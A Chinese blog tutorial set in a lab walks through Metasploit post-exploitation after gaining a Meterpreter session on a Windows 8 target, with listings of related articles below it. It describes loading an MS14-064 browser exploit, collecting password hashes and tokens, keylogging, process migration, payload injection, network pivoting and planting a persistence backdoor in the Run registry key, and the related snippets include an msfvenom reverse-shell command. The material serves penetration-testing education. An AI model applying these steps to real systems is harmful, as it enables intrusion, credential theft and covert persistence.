metasploit后渗透入门--meterpreter

最新推荐文章于 2024-05-13 10:26:43 发布
最新推荐文章于 2024-05-13 10:26:43 发布
阅读量3.2k 收藏 9
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/yalecaltech/article/details/86476423
版权

0x01利用漏洞拿到Meterpreter。

将存放在桌面上的exploit文件复制到metasploit系统指定的exploits存储路径中,并将exploit的属性设置为644.
cp ~/Desktop/ms14_064_ole_exploit.rb /usr/share/metasploit-framework/modules/exploits/windows/browser/
chmod 644 ms14_064_ole_exploit.rb
在这里插入图片描述
在启动的metasploit中使用reload_all加载刚刚添加的exploit,加载完成后发现exploit从1347增加到1348。搜索得到ms14_064 exploit的路径。
reload_all
search ms14_064
在这里插入图片描述
并进行利用
在这里插入图片描述
Win8机器上访问相关uri会显示如下页面
在这里插入图片描述
同时linux下会显示
在这里插入图片描述
出现上图则说明我们拿到了meterpreter。
大部分同学使用metasploit到这儿就停止了,其实接下来可以做的工作还有好多呢。

0x2利用meterpreter进行进一步深入地信息搜集

使用env模块:收集并显示靶机系统上的操作系统环境变量
在这里插入图片描述
Checkvm模块:检查靶机是否为虚拟机。此模块支持Hyper-V、VMware、VirtualCenter、Xen和QEMU虚拟机。
在这里插入图片描述
credential_collector模块:获取受感染主机上的密码哈希和令牌token。
在这里插入图片描述
enum_Applications模块:枚举列出安装在靶机上的应用程序
在这里插入图片描述
Enum_logged_on_users模块:返回当前和最近登录的用户的列表
在这里插入图片描述
Usb_history模块:列出在靶机系统上usb驱动的历史
在这里插入图片描述
enum_Applications模块:枚举安装在靶机上的应用程序。
在这里插入图片描述
Enum_drives: 查看分区情况
在这里插入图片描述在这里插入图片描述

0x2迁移会话,后台运行会话以及针对靶机的操作后台运行及返回会话:

Ctrl+z(也可直接使用background命令):将meterpreter终端隐藏在后台运行

在这里插入图片描述
在这里插入图片描述

迁移会话:
Migrate模块:迁移到指定的进程,如果没有指定的进程,将自动生成一个新进程并迁移到它
(应用场景:如果反弹的meterpreter会话是对方打开了一个你预置特殊代码的word文档(比如最近几个月的office的CVE)而产生的,那么对方一旦关闭掉word文档,我们获取到的meterpreter会话就会随之关闭,所以把会话进程注入到其他常见的系统进程如explorer.exe是一个好方法)
下图展示的是自动生成新进程并进行迁移
在这里插入图片描述
迁移进程后,可以试试dumplinks模块:获得目标主机最近进行的系统操作,访问文件和office文档操作记录
在这里插入图片描述
因为在试验环境下,所以查找不到相关记录

delete_user模块:从受感染的系统中删除指定的用户帐户。
首先切换回win8环境
创建新用户
在这里插入图片描述
接下来运行模块
在这里插入图片描述
再回到windows可以看到创建的用户被删除了
在这里插入图片描述

multi_meterpreter_inject模块:注入一个给定的有效载荷到靶机的进程中。如果没有指定PID值,将创建一个新进程并注入有效负载。
在这里插入图片描述

接下里按照前面实验的操作,同样先隐藏会话
然后使用connect执行靶机ip,端口进行连接
在这里插入图片描述
这样就弹回了cmd
在这里插入图片描述

键盘记录器在当年盗号横行的年代可谓非常火爆,其实meterpreter中也有相关的后渗透模块:
Keylog_recorder:记录靶机键盘输入
在这里插入图片描述
指定会话进行键盘输入的记录
在这里插入图片描述
在靶机上我们随意输入:
在这里插入图片描述
输入完毕后按ctrl+c停止记录。此时靶机上的键盘输入已经被保存在相关路径了。我们可以使用cat看看
在这里插入图片描述
可以看到确实被记录了

内网扫描以及远程控制

autoroute模块:通过Meterpreter会话创建一个新的路由,从而能够更深入地进入目标网络。(此处假设C段为192.168.218.0~255)
在这里插入图片描述
Ctrl+z隐藏会话
在这里插入图片描述
设置好新路由后进行扫描
在这里插入图片描述

植入后门实施远程控制:
通过在meterpreter会话中运行persistence后渗透攻击模块,在目标主机的注册表值 HKLM\Software\Microsoft\Windows\Currentversion\Run中添加键值,达到自启动的目的,-X参数指定启动的方式为开机自启动,-i的参数指定反向连接的时间间隔。然后遍历meterpreter客户端,在指定回连的443端口进行监听,等待后门重新连接
在这里插入图片描述
可以在win8下看到成功植入后门
在这里插入图片描述

Elwood Ying
关注
  • 0
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
msf渗透linux教程,Metasploit后门渗透Linux系统以及跨平台后门生成
weixin_31312621的博客
05-03 1588
本帖最后由 小爱_Joker 于 2017-3-9 12:30 编辑标题:Metasploit后门渗透Linux系统以及跨平台后门生成作者:小爱_Joker难度:两级阅读点:使用Metasploit生成多种后门从而快速渗透linux系统上次发的那个Metasploit使用php后门渗透linux主机 不造为啥不能shell 使用终端 有点尴尬。攻击者IP:192.168.0.5受害者IP:192....
Meterpreter渗透测试入门
ailx10
03-23 831
又是一个下雨的星期天,小黑ailx10开始了渗透测试实验之旅。这篇文章通过实验的方式、踩坑,利用漏洞ms080-067成功入侵WinXP靶机后,后渗透测试工程师Meterpreter掌握的几个最最最基本操作。比如查看靶机信息、截屏、获取键盘记录、收集密码、权限提升等。你也可以参考David Kennedy的《Metasploit:The Penetration Tester's Guide》,清华...
【工具使用】——Metasploit(MSF)使用详解(超详细),2024年最新腾讯网络安全面试必问_msf关闭杀软
最新发布
2401_84972980的博客
05-13 1006
自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。深知大多数网络安全工程师,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!因此收集整理了一份《2024年网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上网络安全知识点!真正的体系化!
meterpreter使用
weixin_30405421的博客
09-26 1480
0x01 系统命令 基本系统命令 1 background # 将当前会话放置后台 2 sessions # sessions –h 查看帮助 3 sessions -i <ID值> #进入会话 -k 杀死会话 4 bgrun / run # 执行已有的模块,输入run后按两下tab,列出已有的脚本 5 info # 查看已有...
meterpreter使用教程
u011250160的博客
04-26 1641
Core Commands ============= Command Description ------- ----------- ? 在meterpreter下输入?和help是一样的就是显示所有的参数 background background和bg是一样的,后台运行shell,也相当于ctrl+z进入后台运行
使用metasploit对linux系统进行渗透测试提权
渗透测试
05-13 2168
文章目录前言一、生成攻击载荷二、获取目标主机物理访问权限三、加载主控端handler总结 前言 使用metasploit对linux系统进行渗透测试 一、生成攻击载荷 使用msfvenom命令创建一个elf文件 ┌──(root????kali)-[~] └─# msfvenom -p linux/x86/meterpreter/reverse_tcp lhost=192.168.1.113 lport=5555 -f elf>pay.elf [-] No platform was selecte
metasploitframework-win-x64
10-05
使用Metasploit安全测试工具在渗透测试中可以做很多事情,你可以保存你的日志、甚至定义每个有效负载在运行完成之后是如何将其自身清除的。值得一提的是这个强大的工具是免费的,它的开发团队由两个全职成员和少数...
metasploit-framework-master.zip
09-08
Metasploit提供了多种类型的有效载荷,如Meterpreter,它是一个功能强大的后渗透阶段的shell。 2. **Encoders(编码器)**:编码器用于绕过目标系统的安全机制,如反病毒软件。它们将有效载荷转换为不同的格式,以...
Metasploit渗透模块开发-三米前有蕉皮1
08-03
前言接着上几个视频都是演示添加用户的,然后突然想起Metasploit里面的添加用户是调用命令行的,我就想能不能把它改为调用API的,给Metasploit提交
Metasploit渗透测试指南完整版-pdf
07-23
软件厂商再也不能推迟发布针对已公布漏洞的补丁了,这是因为Metasploit团队一直都在努力开发各种攻击工具,并将它们贡献给所有Metasploit用户。 Metasploit的设计初衷是打造成一个攻击工具开发平台,本书稍后将讲解...
渗透测试-后渗透阶段.pdf
02-25
Metasploit渗透测试魔鬼训练营》读书笔记文档,是在我看书的过程中对书中理论和一些实践的总结。
[后渗透]获取到 Meterpreter 之后的操作
lvwuwei的博客
05-26 968
[后渗透]获取到 Meterpreter 之后的操作 本文章向大家介绍[后渗透]获取到 Meterpreter 之后的操作,主要包括[后渗透]获取到 Meterpreter 之后的操作使用实例、应用技巧、基本知识点总结和需要注意事项,具有一定的参考价值,需要的朋友可以参考一下。 sysinfo 列出受控主机的系统信息 ls 列出目标主机的文件和文件夹信息 use priv 加载特权提升扩展模块,来扩展meterpreter库 ps 显示所有运行进程以及关联的用户账户 getsystem 通过各种攻击向量来提
LINUX(四)渗透测试metasploit
qq_29507011的博客
11-01 2338
攻击方式 利用漏洞 利用后门 一 利用漏洞 1 扫描端口 (一)使用msf扫描 (1)查看可用端口 search portscan (2)使用扫描模块 use ***** (3)查看配置选项,配置扫描模块 show options set LPOST *** (4)运行扫描模块 run (二)使用nmap 扫描 nmap -O -Pn/-p0 IP nmap -sV IP 2 搜索漏洞...
linux渗透测试Metasploit模块(暴力破解数据库密码)
forget_mt的博客
11-23 2462
前言 学习内容:通过Metasploit暴力破解数据库密码,并在数据库中写入一句话木马。 渗透机:172.16.5.196 含有字典2.txt 靶机:172.16.5.192 安装了mysql vsftpd服务 要保证渗透机与靶机要ping的通 1.输入msfconsole启动Metasploit,使用/auxiliary/scanner/mysql/mysql_login use /auxiliary/scanner/mysql/mysql_login 2.设置目标IP地址...
Meterpreter渗透模块之信息收集
sGanYu
09-23 2131
进程迁移 防止进程被用户关闭,移动shell 1)手动 先使用ps查看目标正在运行的进程 查看当前进程号 meterpreter > getpid Current pid: 1104 从ps查看的运行进程内找出meterpreter的ipd,可以看到,现在的进程为1104,name为svchost.exe,输入migrate 2844迁移至explorer.exe,因为该进程是一个稳定的应用,然后再使用getpid查看新的进程号 meterpreter > mig
Metasploit(后渗透攻击:操作系统后门)
qq_41453632的博客
12-10 3645
   在完成了权限提升之后,我们就应该建立后门(backdoor)了,以维持对目标主机的控制权,这样一来,即使我们所利用的漏洞被补丁程序修复,还可以通过后门继续控制目标系统。 1.Cymothoa后门    Cymothoa是一款可以将ShellCode注入现有进程(即插进程)的后门工具。借助这种注入手段,,他能够把shellcode伪装成常规程序。他所注入的后门程序应当能够与被注入的程序(进...
网络安全工程师教你:Kali Linux之Metasploit渗透测试基础(一)
Kali与编程
09-21 665
课前声明: 本分享仅做学习交流,请自觉遵守法律法规! 搜索:Kali与编程,学习更多网络攻防干货! 下篇文章将在明天下午五点发布,敬请关注! 一、背景介绍 Metasploit就是一个漏洞框架。它的全称叫做The Metasploit Framework,简称叫做MSF。Metasploit作为全球最受欢迎的工具,不仅仅是因为它的方便性和强大性,更重要的是它的框架。它允许使用者开发自己的漏洞脚本,从而进行测试。Metasploit(msf)究竟威力如何呢?接下来让我们一起学习! 二、资源装备 1.安装
metasploit---创建后门
孤的博客
11-22 782
后门技术来维持对被攻击系统的访问。后门可帮助攻击者维持系统访问,并使攻击者无须重复地实施攻击就能随意使用被攻击系统。后门就是就是绕过正常的计算机机制,获取计算机访问权限的方法。 常见EXE后门 metasploit提供了三个辅助工具来创建payload后门,分别是msfpayload、msfencode以及msfvenom,不过现在只有msfvenom(里面集成了msfpayload和msfenc...
利用metasploit渗透测试制作隐藏后门
wr456wr的博客
03-12 691
利用metasploit渗透测试制作隐藏后门 @目录 1. 使用ms17-010永恒之蓝漏洞对win7进行渗透 2. 制作linux无文件木马程序 3. 使用脚本来进行自动创建后门 使用ms17-010永恒之蓝漏洞对win7进行渗透 已知win7ip:192.168.47.129 使用nmap对其进行开放端口探测 在kali端使用msf加载辅助模块探测目标机是否存在ms17-010漏洞 [+] 192.168.47.129:445 - Host is likely VULNERABLE t
metasploit渗透攻击:后门
06-02
Metasploit是一款流行的渗透测试工具,可用于发现系统漏洞、攻击目标系统并获取系统权限。后门是一种常见的攻击手段,它可让黑客在未来再次访问受害者系统而不被发现。使用Metasploit创建后门非常简单,只需要执行...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值